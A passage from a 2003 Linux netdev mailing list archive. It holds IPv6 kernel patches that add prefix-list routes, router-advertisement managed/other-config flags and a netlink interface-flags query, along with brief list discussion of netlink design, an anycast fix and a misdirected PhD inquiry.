inet6_ifaddr *ifp); +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags); static void addrconf_dad_timer(unsigned long data); static void addrconf_dad_completed(struct inet6_ifaddr *ifp); static void addrconf_rs_timer(unsigned long data); @@ -715,7 +715,7 @@ ift->prefered_lft = tmp_prefered_lft; ift->tstamp = ifp->tstamp; spin_unlock_bh(&ift->lock); - addrconf_dad_start(ift); + addrconf_dad_start(ift, 0); in6_ifa_put(ift); in6_dev_put(idev); out: @@ -1211,7 +1211,7 @@ rtmsg.rtmsg_dst_len = 8; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; rtmsg.rtmsg_ifindex = dev->ifindex; - rtmsg.rtmsg_flags = RTF_UP|RTF_ADDRCONF; + rtmsg.rtmsg_flags = RTF_UP; rtmsg.rtmsg_type = RTMSG_NEWROUTE; ip6_route_add(&rtmsg, NULL, NULL); } @@ -1238,7 +1238,7 @@ struct in6_addr addr; ipv6_addr_set(&addr, htonl(0xFE800000), 0, 0, 0); - addrconf_prefix_route(&addr, 64, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&addr, 64, dev, 0, 0); } static struct inet6_dev *addrconf_add_dev(struct net_device *dev) @@ -1330,7 +1330,8 @@ } } else if (pinfo->onlink && valid_lft) { addrconf_prefix_route(&pinfo->prefix, pinfo->prefix_len, - dev, rt_expires, RTF_ADDRCONF|RTF_EXPIRES); + dev, rt_expires, + RTF_ADDRCONF|RTF_EXPIRES|RTF_PREFIX_RT); } if (rt) dst_release(&rt->u.dst); @@ -1378,7 +1379,7 @@ } create = 1; - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, RTF_ADDRCONF|RTF_PREFIX_RT); } if (ifp && valid_lft == 0) { @@ -1529,7 +1530,7 @@ ifp = ipv6_add_addr(idev, pfx, plen, scope, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); return 0; } @@ -1704,7 +1705,7 @@ ifp = ipv6_add_addr(idev, addr, 64, IFA_LINK, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); } } @@ -1943,8 +1944,7 @@ memset(&rtmsg, 0, sizeof(struct in6_rtmsg)); rtmsg.rtmsg_type = RTMSG_NEWROUTE; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; - rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_ADDRCONF | - RTF_DEFAULT | RTF_UP); + rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_DEFAULT | RTF_UP); rtmsg.rtmsg_ifindex = ifp->idev->dev->ifindex; @@ -1958,7 +1958,7 @@ /* * Duplicate Address Detection */ -static void addrconf_dad_start(struct inet6_ifaddr *ifp) +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags) { struct net_device *dev; unsigned long rand_num; @@ -1968,7 +1968,7 @@ addrconf_join_solict(dev, &ifp->addr); if (ifp->prefix_len != 128 && (ifp->flags&IFA_F_PERMANENT)) - addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, flags); net_srandom(ifp->addr.s6_addr32[3]); rand_num = net_random() % (ifp->idev->cnf.rtr_solicit_delay ? : 1); @@ -2451,6 +2451,42 @@ netlink_broadcast(rtnl, skb, 0, RTMGRP_IPV6_IFADDR, GFP_ATOMIC); } +int inet6_dump_linkflags(struct sk_buff *skb, struct netlink_callback *cb) +{ + int ifindex, flags; + struct net_device *dev; + struct inet6_dev *idev; + struct nlmsghdr *nlh; + struct ifp_if6info *ifp = NLMSG_DATA(cb->nlh); + unsigned char *org_tail = skb->tail; + + ifindex = ifp->ifindex; + if ((dev = dev_get_by_index(ifindex)) == NULL) + goto out; + if ((idev = in6_dev_get(dev)) != NULL) { + flags = idev->if_flags; + in6_dev_put(idev); + } else + flags = 0; + dev_put(dev); + + nlh = NLMSG_PUT(skb, NETLINK_CB(cb->skb).pid, cb->nlh->nlmsg_seq, + RTM_GETIFFLAGS, sizeof(*ifp)); + ifp = NLMSG_DATA(nlh); + ifp->flags = flags; + ifp->ifindex = ifindex; /* duplicate info for user to verify */ + + nlh->nlmsg_len = skb->tail - org_tail; + return skb->len; + +nlmsg_failure: + printk(KERN_INFO "inet6_dump_linkflags:skb size not enough\n"); + skb_trim(skb, org_tail - skb->data); + +out: + return -1; +} + static struct rtnetlink_link inet6_rtnetlink_table[RTM_MAX - RTM_BASE + 1] = { [RTM_NEWADDR - RTM_BASE] = { .doit = inet6_rtm_newaddr, }, [RTM_DELADDR - RTM_BASE] = { .doit = inet6_rtm_deladdr, }, @@ -2459,6 +2495,7 @@ [RTM_DELROUTE - RTM_BASE] = { .doit = inet6_rtm_delroute, }, [RTM_GETROUTE - RTM_BASE] = { .doit = inet6_rtm_getroute, .dumpit = inet6_dump_fib, }, + [RTM_GETIFFLAGS - RTM_BASE] = {.dumpit = inet6_dump_linkflags, }, }; static void ipv6_ifa_notify(int event, struct inet6_ifaddr *ifp) diff -ruN linux-2.5.73.org/net/ipv6/ndisc.c test/linux-2.5.73/net/ipv6/ndisc.c --- linux-2.5.73.org/net/ipv6/ndisc.c 2003-06-22 11:32:56.000000000 -0700 +++ test/linux-2.5.73/net/ipv6/ndisc.c 2003-07-14 15:06:14.000000000 -0700 @@ -1036,6 +1036,16 @@ */ in6_dev->if_flags |= IF_RA_RCVD; } + /* + * Remember the managed/otherconf flags from most recently + * receieved RA message (RFC 2462) -- yoshfuji + */ + in6_dev->if_flags = (in6_dev->if_flags & ~(IF_RA_MANAGED| + IF_RA_OTHERCONF)) | + (ra_msg->icmph.icmp6_addrconf_managed ? + IF_RA_MANAGED : 0) | + (ra_msg->icmph.icmp6_addrconf_other ? + IF_RA_OTHERCONF : 0); lifetime = ntohs(ra_msg->icmph.icmp6_rt_lifetime); diff -ruN linux-2.5.73.org/net/ipv6/route.c test/linux-2.5.73/net/ipv6/route.c --- linux-2.5.73.org/net/ipv6/route.c 2003-06-22 11:33:05.000000000 -0700 +++ test/linux-2.5.73/net/ipv6/route.c 2003-07-16 10:42:01.000000000 -0700 @@ -1400,13 +1400,20 @@ struct in6_addr *src, int iif, int type, u32 pid, u32 seq, - struct nlmsghdr *in_nlh) + struct nlmsghdr *in_nlh, int prefix) { struct rtmsg *rtm; struct nlmsghdr *nlh; unsigned char *b = skb->tail; struct rta_cacheinfo ci; + if (prefix) { /* user wants prefix routes only */ + if (!(rt->rt6i_flags & RTF_PREFIX_RT)) { + /* success since this is not a prefix route */ + return 1; + } + } + if (!pid && in_nlh) { pid = in_nlh->nlmsg_pid; } @@ -1487,10 +1494,16 @@ static int rt6_dump_route(struct rt6_info *rt, void *p_arg) { struct rt6_rtnl_dump_arg *arg = (struct rt6_rtnl_dump_arg *) p_arg; + struct rtmsg *rtm; + int prefix; + rtm = NLMSG_DATA(arg->cb->nlh); + if (rtm) + prefix = (rtm->rtm_flags & RTM_F_PREFIX) != 0; + else prefix = 0; return rt6_fill_node(arg->skb, rt, NULL, NULL, 0, RTM_NEWROUTE, NETLINK_CB(arg->cb->skb).pid, arg->cb->nlh->nlmsg_seq, - NULL); + NULL, prefix); } static int fib6_dump_node(struct fib6_walker_t *w) @@ -1638,7 +1651,7 @@ &fl.fl6_dst, &fl.fl6_src, iif, RTM_NEWROUTE, NETLINK_CB(in_skb).pid, - nlh->nlmsg_seq, nlh); + nlh->nlmsg_seq, nlh, 0); if (err < 0) { err = -EMSGSIZE; goto out_free; @@ -1664,7 +1677,7 @@ netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, ENOBUFS); return; } - if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh) < 0) { + if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh, 0) < 0) { kfree_skb(skb); netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, EINVAL); return; From maw48@hermes.cam.ac.uk Thu Jul 17 14:48:39 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 14:48:46 -0700 (PDT) Received: from maroon.csi.cam.ac.uk (maroon.csi.cam.ac.uk [131.111.8.2]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HLmbFl031428 for ; Thu, 17 Jul 2003 14:48:39 -0700 Received: from prayer by maroon.csi.cam.ac.uk with local (Exim 4.14) id 19dGc8-0007P2-NJ for netdev@oss.sgi.com; Thu, 17 Jul 2003 22:48:36 +0100 From: "M.A. Williamson" To: netdev@oss.sgi.com Subject: PhD Research Date: 17 Jul 2003 22:48:36 +0100 X-Mailer: Prayer v1.0.9 X-Originating-IP: [131.111.8.103] Mime-Version: 1.0 Content-Type: text/plain; format=flowed; charset=ISO-8859-1 Message-Id: X-archive-position: 4141 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: maw48@cam.ac.uk Precedence: bulk X-list: netdev Hello to whoever receives this e-mail - I would like to ask for your help. I've been trying to make contact with someone from your R&D for some time, as I wish to establish a dialogue about some academic research I want to carry out for my PhD. The research is in dynamic code optimisation, which I realise isn't necessarily your personal focus - could you possibly suggest someone I could contact within SGI to discuss this further? I've had very little luck in getting through the external-facing administration of the company (which refuses to give out any contact details) and have been forced to resort to finding SGI e-mail addresses in the Linux source (do I get credit for lateral thinking?). Thanks in advance, Mark From yoshfuji@linux-ipv6.org Thu Jul 17 14:51:40 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 14:51:46 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HLpcFl032072 for ; Thu, 17 Jul 2003 14:51:39 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6HLrBBo012990; Fri, 18 Jul 2003 06:53:11 +0900 Date: Thu, 17 Jul 2003 23:53:11 +0200 (CEST) Message-Id: <20030717.235311.94788744.yoshfuji@linux-ipv6.org> To: kuznet@ms2.inr.ac.ru Cc: krkumar@us.ibm.com, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org, yoshfuji@linux-ipv6.org Subject: Re: [PATCH 1/4] Prefix List against 2.5.73 From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <200307170038.EAA12945@dub.inr.ac.ru> References: <3F15E86F.2030707@us.ibm.com> <200307170038.EAA12945@dub.inr.ac.ru> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4142 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <200307170038.EAA12945@dub.inr.ac.ru> (at Thu, 17 Jul 2003 04:38:00 +0400 (MSD)), kuznet@ms2.inr.ac.ru says: > Actually, the original plan was to use ifli_family to query something > or to direct a request to a specific interface on some netdevice. > I wanted to reserve IFLI_PROTINFO attribute to encapsulate information > private for specific family. It was not realized mostly because of absense > of such information. > > Maybe, you will want to resurrect this. Ah, okay, I'm ok to reuse ifi_family in ifinfomsg{}. e.g. if ifi_family == AF_INET6 (and/or AF_UNSPEC?), kernel sends per-interface IPv6 information. IFLA_INET6 provides if_flags (etc?) IFLA_INET6_CONF provides cnf (without proc_dir_entry :-p) IFLA_INET6_STATS provides stats (XXX: missing entries in stats) IFLA_INET6_MCAST provides mc_XXX things etc, etc. sounds reasonable? -- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From davem@redhat.com Thu Jul 17 15:01:43 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 15:01:47 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HM1gFl000307 for ; Thu, 17 Jul 2003 15:01:43 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id OAA26844; Thu, 17 Jul 2003 14:51:16 -0700 Date: Thu, 17 Jul 2003 14:51:15 -0700 From: "David S. Miller" To: kuznet@ms2.inr.ac.ru Cc: pekkas@netcore.fi, mika.liljeberg@welho.com, jmorris@redhat.com, netdev@oss.sgi.com, dlstevens@us.ibm.com Subject: Re: Anycast usage, final diagnosis? (was: IPv6: Fix broken anycast Message-Id: <20030717145115.046fd5ee.davem@redhat.com> In-Reply-To: <200307172052.AAA15032@dub.inr.ac.ru> References: <200307172052.AAA15032@dub.inr.ac.ru> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4143 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Fri, 18 Jul 2003 00:52:03 +0400 (MSD) kuznet@ms2.inr.ac.ru wrote: > > No user should be able to join anycast group, IMHO. > > OK. Done, the patch enclosed. Pekka, please ACK Alexey's patch, I'd like to apply it. Thanks. From maw48@hermes.cam.ac.uk Thu Jul 17 15:02:38 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 15:02:40 -0700 (PDT) Received: from maroon.csi.cam.ac.uk (maroon.csi.cam.ac.uk [131.111.8.2]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HM2bFl000655 for ; Thu, 17 Jul 2003 15:02:37 -0700 Received: from prayer by maroon.csi.cam.ac.uk with local (Exim 4.14) id 19dGpg-0007p3-Kv for netdev@oss.sgi.com; Thu, 17 Jul 2003 23:02:36 +0100 From: "M.A. Williamson" To: netdev@oss.sgi.com Subject: re: PhD Research (sorry) Date: 17 Jul 2003 23:02:36 +0100 X-Mailer: Prayer v1.0.9 X-Originating-IP: [131.111.8.103] Mime-Version: 1.0 Content-Type: text/plain; format=flowed; charset=ISO-8859-1 Message-Id: X-archive-position: 4144 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: maw48@cam.ac.uk Precedence: bulk X-list: netdev I'm told that this e-mail list is merely hosted by SGI for the community, rather than being internal as I thought - sorry guys, I didn't know. I apologise for spamming you with my ignorance! Cheers, Mark From krkumar@us.ibm.com Thu Jul 17 15:08:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 15:08:31 -0700 (PDT) Received: from e31.co.us.ibm.com (e31.co.us.ibm.com [32.97.110.129]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HM8GFl001426 for ; Thu, 17 Jul 2003 15:08:21 -0700 Received: from westrelay04.boulder.ibm.com (westrelay04.boulder.ibm.com [9.17.193.32]) by e31.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6HM7URZ242256; Thu, 17 Jul 2003 18:07:30 -0400 Received: from DYN318430.beaverton.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay04.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6HM7TOr196626; Thu, 17 Jul 2003 16:07:29 -0600 Date: Thu, 17 Jul 2003 15:06:02 -0700 (PDT) From: Krishna Kumar X-X-Sender: krkumar@DYN318430.beaverton.ibm.com To: kuznet@ms2.inr.ac.ru cc: yoshfuji@linux-ipv6.org, , , Subject: [PATCH 2/2] Prefix List and O/M flags against 2.4.21 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4145 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev The same patch against 2.4.21 Thanks, - KK diff -ruN linux-2.4.21.org/include/linux/ipv6_route.h test/linux.2.4.21/include/linux/ipv6_route.h --- linux-2.4.21.org/include/linux/ipv6_route.h 1998-08-27 19:33:08.000000000 -0700 +++ test/linux.2.4.21/include/linux/ipv6_route.h 2003-07-17 11:42:17.000000000 -0700 @@ -25,6 +25,7 @@ #define RTF_DEFAULT 0x00010000 /* default - learned via ND */ #define RTF_ALLONLINK 0x00020000 /* fallback, no routers on link */ #define RTF_ADDRCONF 0x00040000 /* addrconf route - RA */ +#define RTF_PREFIX_RT 0x00080000 /* A prefix only route - RA */ #define RTF_NONEXTHOP 0x00200000 /* route with no nexthop */ #define RTF_EXPIRES 0x00400000 diff -ruN linux-2.4.21.org/include/linux/rtnetlink.h test/linux.2.4.21/include/linux/rtnetlink.h --- linux-2.4.21.org/include/linux/rtnetlink.h 2002-11-28 15:53:15.000000000 -0800 +++ test/linux.2.4.21/include/linux/rtnetlink.h 2003-07-17 13:32:36.000000000 -0700 @@ -46,9 +46,11 @@ #define RTM_DELTFILTER (RTM_BASE+29) #define RTM_GETTFILTER (RTM_BASE+30) -#define RTM_MAX (RTM_BASE+31) +#define RTM_GETIFFLAGS (RTM_BASE+34) -/* +#define RTM_MAX (RTM_GETIFFLAGS+1) + +/* Generic structure for encapsulation optional route information. It is reminiscent of sockaddr, but with sa_family replaced with attribute type. @@ -60,6 +62,13 @@ unsigned short rta_type; }; +/* Structure to return per interface device flags */ +struct ifp_if6info +{ + int ifindex; + int flags; +}; + /* Macros to handle rtattributes */ #define RTA_ALIGNTO 4 @@ -167,6 +176,7 @@ #define RTM_F_NOTIFY 0x100 /* Notify user of route change */ #define RTM_F_CLONED 0x200 /* This route is cloned */ #define RTM_F_EQUALIZE 0x400 /* Multipath equalizer: NI */ +#define RTM_F_PREFIX 0x800 /* Prefix addresses */ /* Reserved table identifiers */ diff -ruN linux-2.4.21.org/include/net/if_inet6.h test/linux.2.4.21/include/net/if_inet6.h --- linux-2.4.21.org/include/net/if_inet6.h 2003-06-13 07:51:39.000000000 -0700 +++ test/linux.2.4.21/include/net/if_inet6.h 2003-07-17 11:43:50.000000000 -0700 @@ -15,6 +15,8 @@ #ifndef _NET_IF_INET6_H #define _NET_IF_INET6_H +#define IF_RA_OTHERCONF 0x80 +#define IF_RA_MANAGED 0x40 #define IF_RA_RCVD 0x20 #define IF_RS_SENT 0x10 diff -ruN linux-2.4.21.org/net/ipv6/addrconf.c test/linux.2.4.21/net/ipv6/addrconf.c --- linux-2.4.21.org/net/ipv6/addrconf.c 2003-06-13 07:51:39.000000000 -0700 +++ test/linux.2.4.21/net/ipv6/addrconf.c 2003-07-17 13:34:02.000000000 -0700 @@ -101,7 +101,7 @@ static int addrconf_ifdown(struct net_device *dev, int how); -static void addrconf_dad_start(struct inet6_ifaddr *ifp); +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags); static void addrconf_dad_timer(unsigned long data); static void addrconf_dad_completed(struct inet6_ifaddr *ifp); static void addrconf_rs_timer(unsigned long data); @@ -889,7 +889,7 @@ rtmsg.rtmsg_dst_len = 8; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; rtmsg.rtmsg_ifindex = dev->ifindex; - rtmsg.rtmsg_flags = RTF_UP|RTF_ADDRCONF; + rtmsg.rtmsg_flags = RTF_UP; rtmsg.rtmsg_type = RTMSG_NEWROUTE; ip6_route_add(&rtmsg, NULL); } @@ -916,7 +916,7 @@ struct in6_addr addr; ipv6_addr_set(&addr, htonl(0xFE800000), 0, 0, 0); - addrconf_prefix_route(&addr, 64, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&addr, 64, dev, 0, 0); } static struct inet6_dev *addrconf_add_dev(struct net_device *dev) @@ -1008,7 +1008,8 @@ } } else if (pinfo->onlink && valid_lft) { addrconf_prefix_route(&pinfo->prefix, pinfo->prefix_len, - dev, rt_expires, RTF_ADDRCONF|RTF_EXPIRES); + dev, rt_expires, + RTF_ADDRCONF|RTF_EXPIRES|RTF_PREFIX_RT); } if (rt) dst_release(&rt->u.dst); @@ -1054,7 +1055,7 @@ return; } - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, RTF_ADDRCONF|RTF_PREFIX_RT); } if (ifp && valid_lft == 0) { @@ -1166,7 +1167,7 @@ ifp = ipv6_add_addr(idev, pfx, plen, scope, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); return 0; } @@ -1341,7 +1342,7 @@ ifp = ipv6_add_addr(idev, addr, 64, IFA_LINK, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); } } @@ -1578,8 +1579,7 @@ memset(&rtmsg, 0, sizeof(struct in6_rtmsg)); rtmsg.rtmsg_type = RTMSG_NEWROUTE; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; - rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_ADDRCONF | - RTF_DEFAULT | RTF_UP); + rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_DEFAULT | RTF_UP); rtmsg.rtmsg_ifindex = ifp->idev->dev->ifindex; @@ -1593,7 +1593,7 @@ /* * Duplicate Address Detection */ -static void addrconf_dad_start(struct inet6_ifaddr *ifp) +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags) { struct net_device *dev; unsigned long rand_num; @@ -1603,7 +1603,7 @@ addrconf_join_solict(dev, &ifp->addr); if (ifp->prefix_len != 128 && (ifp->flags&IFA_F_PERMANENT)) - addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, flags); net_srandom(ifp->addr.s6_addr32[3]); rand_num = net_random() % (ifp->idev->cnf.rtr_solicit_delay ? : 1); @@ -1971,6 +1971,42 @@ netlink_broadcast(rtnl, skb, 0, RTMGRP_IPV6_IFADDR, GFP_ATOMIC); } +int inet6_dump_linkflags(struct sk_buff *skb, struct netlink_callback *cb) +{ + int ifindex, flags; + struct net_device *dev; + struct inet6_dev *idev; + struct nlmsghdr *nlh; + struct ifp_if6info *ifp = NLMSG_DATA(cb->nlh); + unsigned char *org_tail = skb->tail; + + ifindex = ifp->ifindex; + if ((dev = dev_get_by_index(ifindex)) == NULL) + goto out; + if ((idev = in6_dev_get(dev)) != NULL) { + flags = idev->if_flags; + in6_dev_put(idev); + } else + flags = 0; + dev_put(dev); + + nlh = NLMSG_PUT(skb, NETLINK_CB(cb->skb).pid, cb->nlh->nlmsg_seq, + RTM_GETIFFLAGS, sizeof(*ifp)); + ifp = NLMSG_DATA(nlh); + ifp->flags = flags; + ifp->ifindex = ifindex; /* duplicate info for user to verify */ + + nlh->nlmsg_len = skb->tail - org_tail; + return skb->len; + +nlmsg_failure: + printk(KERN_INFO "inet6_dump_linkflags:skb size not enough\n"); + skb_trim(skb, org_tail - skb->data); + +out: + return -1; +} + static struct rtnetlink_link inet6_rtnetlink_table[RTM_MAX-RTM_BASE+1] = { { NULL, NULL, }, @@ -1987,6 +2023,36 @@ { inet6_rtm_delroute, NULL, }, { inet6_rtm_getroute, inet6_dump_fib, }, { NULL, NULL, }, + + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, inet6_dump_linkflags }, + { NULL, NULL, }, }; static void ipv6_ifa_notify(int event, struct inet6_ifaddr *ifp) diff -ruN linux-2.4.21.org/net/ipv6/ndisc.c test/linux.2.4.21/net/ipv6/ndisc.c --- linux-2.4.21.org/net/ipv6/ndisc.c 2003-06-13 07:51:39.000000000 -0700 +++ test/linux.2.4.21/net/ipv6/ndisc.c 2003-07-14 15:09:28.000000000 -0700 @@ -940,6 +940,16 @@ */ in6_dev->if_flags |= IF_RA_RCVD; } + /* + * Remember the managed/otherconf flags from most recently + * receieved RA message (RFC 2462) -- yoshfuji + */ + in6_dev->if_flags = (in6_dev->if_flags & ~(IF_RA_MANAGED| + IF_RA_OTHERCONF)) | + (ra_msg->icmph.icmp6_addrconf_managed ? + IF_RA_MANAGED : 0) | + (ra_msg->icmph.icmp6_addrconf_other ? + IF_RA_OTHERCONF : 0); lifetime = ntohs(ra_msg->icmph.icmp6_rt_lifetime); diff -ruN linux-2.4.21.org/net/ipv6/route.c test/linux.2.4.21/net/ipv6/route.c --- linux-2.4.21.org/net/ipv6/route.c 2003-06-13 07:51:39.000000000 -0700 +++ test/linux.2.4.21/net/ipv6/route.c 2003-07-16 11:09:45.000000000 -0700 @@ -1516,13 +1516,20 @@ struct in6_addr *src, int iif, int type, u32 pid, u32 seq, - struct nlmsghdr *in_nlh) + struct nlmsghdr *in_nlh, int prefix) { struct rtmsg *rtm; struct nlmsghdr *nlh; unsigned char *b = skb->tail; struct rta_cacheinfo ci; + if (prefix) { /* user wants prefix routes only */ + if (!(rt->rt6i_flags & RTF_PREFIX_RT)) { + /* success since this is not a prefix route */ + return 1; + } + } + if (!pid && in_nlh) { pid = in_nlh->nlmsg_pid; } @@ -1603,10 +1610,16 @@ static int rt6_dump_route(struct rt6_info *rt, void *p_arg) { struct rt6_rtnl_dump_arg *arg = (struct rt6_rtnl_dump_arg *) p_arg; + struct rtmsg *rtm; + int prefix; + rtm = NLMSG_DATA(arg->cb->nlh); + if (rtm) + prefix = (rtm->rtm_flags & RTM_F_PREFIX) != 0; + else prefix = 0; return rt6_fill_node(arg->skb, rt, NULL, NULL, 0, RTM_NEWROUTE, NETLINK_CB(arg->cb->skb).pid, arg->cb->nlh->nlmsg_seq, - NULL); + NULL, prefix); } static int fib6_dump_node(struct fib6_walker_t *w) @@ -1757,7 +1770,7 @@ fl.nl_u.ip6_u.saddr, iif, RTM_NEWROUTE, NETLINK_CB(in_skb).pid, - nlh->nlmsg_seq, nlh); + nlh->nlmsg_seq, nlh, 0); if (err < 0) { err = -EMSGSIZE; goto out_free; @@ -1783,7 +1796,7 @@ netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, ENOBUFS); return; } - if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh) < 0) { + if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh, 0) < 0) { kfree_skb(skb); netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, EINVAL); return; From yoshfuji@linux-ipv6.org Thu Jul 17 15:20:37 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 15:20:43 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HMKZFl002321 for ; Thu, 17 Jul 2003 15:20:37 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6HMM9Bo013348; Fri, 18 Jul 2003 07:22:10 +0900 Date: Fri, 18 Jul 2003 00:22:09 +0200 (CEST) Message-Id: <20030718.002209.104303756.yoshfuji@linux-ipv6.org> To: krkumar@us.ibm.com Cc: kuznet@ms2.inr.ac.ru, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org, yoshfuji@linux-ipv6.org Subject: Re: [PATCH 2/2] Prefix List and O/M flags against 2.4.21 From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: References: Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4146 X-ecartis-version: Ecartis v1.0.0 